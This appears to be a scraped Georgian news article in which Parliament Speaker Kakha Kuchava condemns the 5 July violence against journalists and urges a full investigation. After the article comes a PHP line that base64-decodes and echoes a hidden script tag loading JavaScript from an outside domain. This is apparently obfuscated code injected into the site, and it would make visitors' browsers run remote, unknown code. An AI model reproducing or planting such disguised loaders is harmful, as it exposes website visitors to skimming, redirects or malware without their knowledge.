celsiusi
ავერსი საქკაბელი
პარლამენტის თავმჯდომარე კახა კუჭავა ბოლოდროინდელ მოვლენებს ბიუროს სხდომაზე გამოეხმაურა და განაცხადა, რომ ყველაფერი უნდა გაკეთდეს, რათა სიმართლე დადგინდეს.
 
კუჭავას თქმით, ჩვენ 21-ე საუკუნეში ვცხოვრობთ, ყველაფერი არის კამერაზე ასახული და ვერავინ გაექცევა მართლმსაჯულებას.
 
"ეს არის სამწუხარო და ტრაგიკული განვითარება იმ მოვლენების, რომლებიც 5 ივლისს დაიწყო, რომელსაც არანაირი გამართლება არ აქვს. ვახსენეთ და კიდევ ერთხელ გავიმეორებ, სამწუხაროდ, ბევრჯერ მოგვიწევს განმეორება იმ შავი ლაქისა, რომელიც ჩვენს ისტორიას დარჩა 5 ივლისის სახით, ის, რაც ჩვენ ვიხილეთ – ძალადობა ჟურნალისტებზე, ოპერატორებზე, ადამიანები, რომლებიც თავიანთ საქმიანობას ასრულებდნენ და ჯგუფურად მოხდა მათზე ძალადობა. ჩვენ 21-ე საუკუნეში ვცხოვრობთ, ყველაფერი არის კამერაზე ასახული, ვერავინ გაექცევა მართლმსაჯულებას.
 
ერი, ბერი – ყველა თანასწორია. სამწუხაროდ, ჩვენ, ვისმენდით წახალისებებსაც კი, ძალადობაზე, რომელიც არ შეიძლება დარჩეს რეაგირების გარეშე და ამისთვის ძალიან მნიშვნელოვანია არა მხოლოდ საგამოძიებო უწყებების მხრიდან საკმაოდ გახსნილი გამოძიების ჩატარება და პასუხების გაცემა, არამედ პარლამენტის მხრიდანაც მაქსიმუმი უნდა გაკეთდეს," - განაცხადა კახა კუჭავამ.
1322
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");